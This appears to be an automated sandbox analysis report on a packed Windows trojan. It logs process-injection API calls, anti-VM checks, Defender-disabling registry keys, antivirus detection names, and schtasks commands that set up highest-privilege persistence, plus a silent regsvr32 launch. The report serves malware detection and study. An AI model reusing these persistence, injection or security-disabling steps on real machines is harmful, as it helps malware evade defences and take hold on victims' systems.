RegQueryValueExW Sept. 6, 2023, 7:41 a.m.	key_handle: 0x000004f4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Excel MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0016-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Sept. 6, 2023, 7:41 a.m.	key_handle: 0x000004f4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office PowerPoint MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0018-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Sept. 6, 2023, 7:41 a.m.	key_handle: 0x000004f4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Publisher MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0019-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Sept. 6, 2023, 7:41 a.m.	key_handle: 0x000004f4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Outlook MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001A-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Sept. 6, 2023, 7:41 a.m.	key_handle: 0x000004f4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Word MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001B-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Sept. 6, 2023, 7:41 a.m.	key_handle: 0x000004f4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Proof (English) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Sept. 6, 2023, 7:41 a.m.	key_handle: 0x000004f4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Proof (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Sept. 6, 2023, 7:41 a.m.	key_handle: 0x000004f4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office IME (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0028-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Sept. 6, 2023, 7:41 a.m.	key_handle: 0x000004f4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Proofing (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-002C-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Sept. 6, 2023, 7:41 a.m.	key_handle: 0x000004f4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Enterprise 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0030-0000-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Sept. 6, 2023, 7:41 a.m.	key_handle: 0x000004f4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office InfoPath MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0044-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Sept. 6, 2023, 7:41 a.m.	key_handle: 0x000004f4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Shared MUI (English) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Sept. 6, 2023, 7:41 a.m.	key_handle: 0x000004f4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Shared MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Sept. 6, 2023, 7:41 a.m.	key_handle: 0x000004f4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office OneNote MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00A1-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Sept. 6, 2023, 7:41 a.m.	key_handle: 0x000004f4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Groove MUI (English) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00BA-0409-0000-0000000FF1CE}\DisplayName	1

Used NtSetContextThread to modify a thread in a remote process indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2752 called NtSetContextThread to modify thread in remote process 2608
NtSetContextThread Sept. 6, 2023, 7:41 a.m.	registers.eip: 1995571652 registers.esp: 3604048 registers.edi: 0 registers.eax: 4510606 registers.ebp: 0 registers.edx: 0 registers.ebx: -139264 registers.esi: 0 registers.ecx: 0 thread_handle: 0x00000070 process_identifier: 2608	1	0	0

Resumed a suspended thread in a remote process potentially indicative of process injection (4 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 1536 resumed a thread in remote process 3040
Process injection	Process 2752 resumed a thread in remote process 2608
NtResumeThread Sept. 6, 2023, 7:41 a.m.	thread_handle: 0x000002a8 suspend_count: 1 process_identifier: 3040	1	0	0
NtResumeThread Sept. 6, 2023, 7:41 a.m.	thread_handle: 0x00000070 suspend_count: 1 process_identifier: 2608	1	0	0

Uses Sysinternals tools in order to add additional command line functionality (2 events)

cmdline	schtasks /create /f /RU "test22" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
cmdline	schtasks /create /f /RU "test22" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST

Detects VirtualBox using WNetGetProviderName trick (1 event)

Time & API	Arguments	Status	Return	Repeated
WNetGetProviderNameW Sept. 6, 2023, 7:41 a.m.	net_type: 0x00250000		1222	0

Disables Windows Security features (20 events)

description	attempts to modify windows defender policies	registry	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{2E86E990-D399-4DFB-B604-94C870D2F15A}Machine\Software\Policies\Microsoft\Windows Defender\DisableRoutinelyTakingAction
description	attempts to modify windows defender policies	registry	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{A16524E6-05EB-4401-9385-47CE0B48E681}Machine\Software\Policies\Microsoft\Windows Defender\Exclusions\Exclusions_Extensions
description	attempts to modify windows defender policies	registry	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{2E86E990-D399-4DFB-B604-94C870D2F15A}Machine\Software\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection
description	attempts to modify windows defender policies	registry	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{A16524E6-05EB-4401-9385-47CE0B48E681}Machine\Software\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection
description	attempts to modify windows defender policies	registry	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{A16524E6-05EB-4401-9385-47CE0B48E681}Machine\Software\Policies\Microsoft\Windows Defender\Exclusions\Extensions\exe
description	attempts to modify windows defender policies	registry	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{A16524E6-05EB-4401-9385-47CE0B48E681}Machine\Software\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection
description	attempts to modify windows defender policies	registry	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{A16524E6-05EB-4401-9385-47CE0B48E681}Machine\Software\Policies\Microsoft\Windows Defender\DisableRoutinelyTakingAction
description	attempts to modify windows defender policies	registry	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{2E86E990-D399-4DFB-B604-94C870D2F15A}Machine\Software\Policies\Microsoft\Windows Defender\DisableAntiSpyware
description	attempts to modify windows defender policies	registry	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{2E86E990-D399-4DFB-B604-94C870D2F15A}Machine\Software\Policies\Microsoft\Windows Defender\Exclusions\Extensions\exe
description	attempts to modify windows defender policies	registry	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{2E86E990-D399-4DFB-B604-94C870D2F15A}Machine\Software\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring
description	attempts to modify windows defender policies	registry	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{2E86E990-D399-4DFB-B604-94C870D2F15A}Machine\Software\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable
description	attempts to modify windows defender policies	registry	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{A16524E6-05EB-4401-9385-47CE0B48E681}Machine\Software\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable
description	attempts to modify windows defender policies	registry	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{2E86E990-D399-4DFB-B604-94C870D2F15A}Machine\Software\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRawWriteNotification
description	attempts to modify windows defender policies	registry	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{2E86E990-D399-4DFB-B604-94C870D2F15A}Machine\Software\Policies\Microsoft\Windows Defender\Exclusions\Exclusions_Extensions
description	attempts to modify windows defender policies	registry	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{A16524E6-05EB-4401-9385-47CE0B48E681}Machine\Software\Policies\Microsoft\Windows Defender\DisableAntiSpyware
description	attempts to modify windows defender policies	registry	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{A16524E6-05EB-4401-9385-47CE0B48E681}Machine\Software\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring
description	attempts to modify windows defender policies	registry	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{A16524E6-05EB-4401-9385-47CE0B48E681}Machine\Software\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRawWriteNotification
description	attempts to modify windows defender policies	registry	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{2E86E990-D399-4DFB-B604-94C870D2F15A}Machine\Software\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring
description	attempts to modify windows defender policies	registry	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{2E86E990-D399-4DFB-B604-94C870D2F15A}Machine\Software\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection
description	attempts to modify windows defender policies	registry	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{A16524E6-05EB-4401-9385-47CE0B48E681}Machine\Software\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring

Executed a process and injected code into it, probably while unpacking (50 out of 74 events)

Time & API	Arguments	Status	Return
NtResumeThread Sept. 6, 2023, 7:39 a.m.	thread_handle: 0x00000108 suspend_count: 1 process_identifier: 2540	1	0
NtResumeThread Sept. 6, 2023, 7:39 a.m.	thread_handle: 0x000003c0 suspend_count: 1 process_identifier: 2540	1	0
CreateProcessInternalW Sept. 6, 2023, 7:39 a.m.	thread_identifier: 2784 thread_handle: 0x00000600 process_identifier: 2780 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Users\test22\Documents\qZa2Z7Puv7E4iAuW3ONvhvPf.exe track: 1 command_line: "C:\Users\test22\Documents\qZa2Z7Puv7E4iAuW3ONvhvPf.exe" filepath_r: C:\Users\test22\Documents\qZa2Z7Puv7E4iAuW3ONvhvPf.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000604	1	1
CreateProcessInternalW Sept. 6, 2023, 7:39 a.m.	thread_identifier: 2820 thread_handle: 0x0000056c process_identifier: 2816 current_directory: filepath: track: 1 command_line: schtasks /create /f /RU "test22" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 0 process_handle: 0x00000574	1	1
CreateProcessInternalW Sept. 6, 2023, 7:39 a.m.	thread_identifier: 2888 thread_handle: 0x000005e4 process_identifier: 2884 current_directory: filepath: track: 1 command_line: schtasks /create /f /RU "test22" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 0 process_handle: 0x000005f0	1	1
CreateProcessInternalW Sept. 6, 2023, 7:34 a.m.	thread_identifier: 1792 thread_handle: 0x0000000000000880 process_identifier: 1536 current_directory: C:\Users\test22\Pictures\Minor Policy filepath: C:\Users\test22\Pictures\Minor Policy\EPOgquOT1MnP1nqso8haYw46.exe track: 1 command_line: "C:\Users\test22\Pictures\Minor Policy\EPOgquOT1MnP1nqso8haYw46.exe" filepath_r: C:\Users\test22\Pictures\Minor Policy\EPOgquOT1MnP1nqso8haYw46.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000000000008ac	1	1
CreateProcessInternalW Sept. 6, 2023, 7:34 a.m.	thread_identifier: 2768 thread_handle: 0x0000000000000be8 process_identifier: 2760 current_directory: C:\Users\test22\Pictures\Minor Policy filepath: C:\Users\test22\Pictures\Minor Policy\U_WUTTisAZX3VLe2b40_scVK.exe track: 1 command_line: "C:\Users\test22\Pictures\Minor Policy\U_WUTTisAZX3VLe2b40_scVK.exe" filepath_r: C:\Users\test22\Pictures\Minor Policy\U_WUTTisAZX3VLe2b40_scVK.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x0000000000000ab0	1	1
CreateProcessInternalW Sept. 6, 2023, 7:34 a.m.	thread_identifier: 2764 thread_handle: 0x0000000000000bfc process_identifier: 2752 current_directory: C:\Users\test22\Pictures\Minor Policy filepath: C:\Users\test22\Pictures\Minor Policy\nPtRtTHIn9wndsrAGmvS3n2G.exe track: 1 command_line: "C:\Users\test22\Pictures\Minor Policy\nPtRtTHIn9wndsrAGmvS3n2G.exe" filepath_r: C:\Users\test22\Pictures\Minor Policy\nPtRtTHIn9wndsrAGmvS3n2G.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x0000000000000bf8	1	1
CreateProcessInternalW Sept. 6, 2023, 7:34 a.m.	thread_identifier: 1848 thread_handle: 0x0000000000000bc0 process_identifier: 1616 current_directory: C:\Users\test22\Pictures\Minor Policy filepath: C:\Users\test22\Pictures\Minor Policy\sVRSTvhMzuBInyoVatf1LIkj.exe track: 1 command_line: "C:\Users\test22\Pictures\Minor Policy\sVRSTvhMzuBInyoVatf1LIkj.exe" filepath_r: C:\Users\test22\Pictures\Minor Policy\sVRSTvhMzuBInyoVatf1LIkj.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x0000000000000bcc	1	1
CreateProcessInternalW Sept. 6, 2023, 7:34 a.m.	thread_identifier: 1948 thread_handle: 0x0000000000000bd8 process_identifier: 2756 current_directory: C:\Users\test22\Pictures\Minor Policy filepath: C:\Users\test22\Pictures\Minor Policy\Ms6gVLaCMj3QjsT0nxwUAzQV.exe track: 1 command_line: "C:\Users\test22\Pictures\Minor Policy\Ms6gVLaCMj3QjsT0nxwUAzQV.exe" filepath_r: C:\Users\test22\Pictures\Minor Policy\Ms6gVLaCMj3QjsT0nxwUAzQV.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x0000000000000bc8	1	1
CreateProcessInternalW Sept. 6, 2023, 7:34 a.m.	thread_identifier: 2772 thread_handle: 0x0000000000000c10 process_identifier: 1332 current_directory: C:\Users\test22\Pictures\Minor Policy filepath: C:\Users\test22\Pictures\Minor Policy\x7v28_ox_gsKhD1Q9EW3AnPz.exe track: 1 command_line: "C:\Users\test22\Pictures\Minor Policy\x7v28_ox_gsKhD1Q9EW3AnPz.exe" filepath_r: C:\Users\test22\Pictures\Minor Policy\x7v28_ox_gsKhD1Q9EW3AnPz.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x0000000000000c04	1	1
CreateProcessInternalW Sept. 6, 2023, 7:34 a.m.	thread_identifier: 1380 thread_handle: 0x0000000000000bd4 process_identifier: 1308 current_directory: C:\Users\test22\Pictures\Minor Policy filepath: C:\Users\test22\Pictures\Minor Policy\kSIDO1g7b2Ov3jXySZx1v2JG.exe track: 1 command_line: "C:\Users\test22\Pictures\Minor Policy\kSIDO1g7b2Ov3jXySZx1v2JG.exe" filepath_r: C:\Users\test22\Pictures\Minor Policy\kSIDO1g7b2Ov3jXySZx1v2JG.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x0000000000000bd0	1	1
NtResumeThread Sept. 6, 2023, 7:41 a.m.	thread_handle: 0x00000180 suspend_count: 1 process_identifier: 1536	1	0
CreateProcessInternalW Sept. 6, 2023, 7:41 a.m.	thread_identifier: 3044 thread_handle: 0x000002a8 process_identifier: 3040 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\regsvr32.exe track: 1 command_line: "C:\Windows\System32\regsvr32.exe" /U .\VVTQR9K.VA3 -s filepath_r: C:\Windows\System32\regsvr32.exe stack_pivoted: 0 creation_flags: 67634196 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_SUSPENDED\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x000002a4	1	1
NtResumeThread Sept. 6, 2023, 7:41 a.m.	thread_handle: 0x000002a8 suspend_count: 1 process_identifier: 3040	1	0
CreateProcessInternalW Sept. 6, 2023, 7:41 a.m.	thread_identifier: 2352 thread_handle: 0x00000070 process_identifier: 2608 current_directory: filepath: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe track: 1 command_line: filepath_r: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe stack_pivoted: 0 creation_flags: 4 (CREATE_SUSPENDED) inherit_handles: 0 process_handle: 0x00000074	1	1
NtGetContextThread Sept. 6, 2023, 7:41 a.m.	thread_handle: 0x00000070	1	0
NtAllocateVirtualMemory Sept. 6, 2023, 7:41 a.m.	process_identifier: 2608 region_size: 368640 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000074	1	0
WriteProcessMemory Sept. 6, 2023, 7:41 a.m.	buffer: base_address: 0x00400000 process_identifier: 2608 process_handle: 0x00000074	1	1
WriteProcessMemory Sept. 6, 2023, 7:41 a.m.	buffer: @ base_address: 0xfffde008 process_identifier: 2608 process_handle: 0x00000074	1	1
NtSetContextThread Sept. 6, 2023, 7:41 a.m.	registers.eip: 1995571652 registers.esp: 3604048 registers.edi: 0 registers.eax: 4510606 registers.ebp: 0 registers.edx: 0 registers.ebx: -139264 registers.esi: 0 registers.ecx: 0 thread_handle: 0x00000070 process_identifier: 2608	1	0
NtResumeThread Sept. 6, 2023, 7:41 a.m.	thread_handle: 0x00000070 suspend_count: 1 process_identifier: 2608	1	0
CreateProcessInternalW Sept. 6, 2023, 7:41 a.m.	thread_identifier: 2132 thread_handle: 0x0000001c process_identifier: 2128 current_directory: filepath: track: 1 command_line: .\Install.exe filepath_r: stack_pivoted: 0 creation_flags: 0 () inherit_handles: 0 process_handle: 0x00000108	1	1
NtResumeThread Sept. 6, 2023, 7:41 a.m.	thread_handle: 0x00000100 suspend_count: 1 process_identifier: 2756	1	0
NtResumeThread Sept. 6, 2023, 7:41 a.m.	thread_handle: 0x000000dc suspend_count: 1 process_identifier: 1332	1	0
NtResumeThread Sept. 6, 2023, 7:41 a.m.	thread_handle: 0x0000014c suspend_count: 1 process_identifier: 1332	1	0
NtResumeThread Sept. 6, 2023, 7:41 a.m.	thread_handle: 0x000001b4 suspend_count: 1 process_identifier: 1332	1	0
NtResumeThread Sept. 6, 2023, 7:41 a.m.	thread_handle: 0x000001e8 suspend_count: 1 process_identifier: 1332	1	0
NtGetContextThread Sept. 6, 2023, 7:41 a.m.	thread_handle: 0x000000e0	1	0
NtGetContextThread Sept. 6, 2023, 7:41 a.m.	thread_handle: 0x000000e0	1	0
NtResumeThread Sept. 6, 2023, 7:41 a.m.	thread_handle: 0x000000e0 suspend_count: 1 process_identifier: 1332	1	0
NtGetContextThread Sept. 6, 2023, 7:41 a.m.	thread_handle: 0x000000e0	1	0
NtGetContextThread Sept. 6, 2023, 7:41 a.m.	thread_handle: 0x000000e0	1	0
NtResumeThread Sept. 6, 2023, 7:41 a.m.	thread_handle: 0x000000e0 suspend_count: 1 process_identifier: 1332	1	0
NtResumeThread Sept. 6, 2023, 7:41 a.m.	thread_handle: 0x000000dc suspend_count: 1 process_identifier: 1308	1	0
NtResumeThread Sept. 6, 2023, 7:41 a.m.	thread_handle: 0x00000154 suspend_count: 1 process_identifier: 1308	1	0
NtResumeThread Sept. 6, 2023, 7:41 a.m.	thread_handle: 0x000001a4 suspend_count: 1 process_identifier: 1308	1	0
NtResumeThread Sept. 6, 2023, 7:41 a.m.	thread_handle: 0x000001ec suspend_count: 1 process_identifier: 1308	1	0
NtResumeThread Sept. 6, 2023, 7:41 a.m.	thread_handle: 0x000002e0 suspend_count: 1 process_identifier: 1308	1	0
NtResumeThread Sept. 6, 2023, 7:41 a.m.	thread_handle: 0x00000318 suspend_count: 1 process_identifier: 1308	1	0
NtResumeThread Sept. 6, 2023, 7:41 a.m.	thread_handle: 0x0000039c suspend_count: 1 process_identifier: 1308	1	0
NtResumeThread Sept. 6, 2023, 7:41 a.m.	thread_handle: 0x000003dc suspend_count: 1 process_identifier: 1308	1	0
NtResumeThread Sept. 6, 2023, 7:41 a.m.	thread_handle: 0x00000444 suspend_count: 1 process_identifier: 1308	1	0
NtResumeThread Sept. 6, 2023, 7:41 a.m.	thread_handle: 0x00000464 suspend_count: 1 process_identifier: 1308	1	0
NtResumeThread Sept. 6, 2023, 7:41 a.m.	thread_handle: 0x00000494 suspend_count: 1 process_identifier: 1308	1	0
NtResumeThread Sept. 6, 2023, 7:41 a.m.	thread_handle: 0x000004b0 suspend_count: 1 process_identifier: 1308	1	0
NtResumeThread Sept. 6, 2023, 7:41 a.m.	thread_handle: 0x000004c8 suspend_count: 1 process_identifier: 1308	1	0
NtResumeThread Sept. 6, 2023, 7:41 a.m.	thread_handle: 0x000004e0 suspend_count: 1 process_identifier: 1308	1	0
NtResumeThread Sept. 6, 2023, 7:41 a.m.	thread_handle: 0x000004fc suspend_count: 1 process_identifier: 1308	1	0
NtResumeThread Sept. 6, 2023, 7:41 a.m.	thread_handle: 0x00000518 suspend_count: 1 process_identifier: 1308	1	0

File has been identified by 52 AntiVirus engines on VirusTotal as malicious (50 out of 52 events)

Bkav	W32.Common.99B228E7
Lionic	Trojan.Win32.Scar.4!c
tehtris	Generic.Malware
MicroWorld-eScan	Trojan.GenericKD.69053871
FireEye	Generic.mg.ca7502cd02a0a170
McAfee	Artemis!CA7502CD02A0
Malwarebytes	Malware.Heuristic.1003
Sangfor	Trojan.Win32.VMProtect.V5go
CrowdStrike	win/malicious_confidence_100% (W)
Alibaba	Trojan:Win32/VMProtect.4775d71c
K7GW	Trojan ( 0059f3ca1 )
K7AntiVirus	Trojan ( 0059f3ca1 )
Arcabit	Trojan.Generic.D41DADAF
BitDefenderTheta	Gen:NN.ZexaF.36662.@JW@ayaqThei
Symantec	ML.Attribute.HighConfidence
Elastic	malicious (high confidence)
ESET-NOD32	a variant of Win32/Packed.VMProtect.AU suspicious
Cynet	Malicious (score: 100)
APEX	Malicious
Kaspersky	Trojan.Win32.Scar.tqfq
BitDefender	Trojan.GenericKD.69053871
NANO-Antivirus	Trojan.Win32.Scar.jzivon
Avast	Win32:Malware-gen
Tencent	Malware.Win32.Gencirc.13edf83b
Emsisoft	Trojan.GenericKD.69053871 (B)
F-Secure	Trojan.TR/Scar.odaep
DrWeb	Trojan.DownLoader46.2167
VIPRE	Trojan.GenericKD.69053871
TrendMicro	Trojan.Win32.PRIVATELOADER.YXDH5Z
McAfee-GW-Edition	BehavesLike.Win32.Generic.wc
Trapmine	malicious.high.ml.score
Sophos	Generic Reputation PUA (PUA)
SentinelOne	Static AI - Suspicious PE
Webroot	W32.Trojan.Gen
Avira	TR/Scar.odaep
MAX	malware (ai score=83)
Antiy-AVL	GrayWare/Win32.Wacapew
Gridinsoft	Malware.Win32.Gen.bot
Xcitium	Malware@#fxsyhwq7ktti
Microsoft	Trojan:Win32/Synder!ic
ZoneAlarm	Trojan.Win32.Scar.tqfq
GData	Trojan.GenericKD.69053871
Google	Detected
AhnLab-V3	Malware/Win.Generic.C5479697
ALYac	Trojan.GenericKD.69053871
VBA32	Trojan.Scar
Cylance	unsafe
TrendMicro-HouseCall	Trojan.Win32.PRIVATELOADER.YXDH5Z
Rising	Trojan.Generic@AI.96 (RDML:5mWdHcdJW3oCmO3TXwe9mA)
MaxSecure	Trojan.Malware.217099605.susgen

Services.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All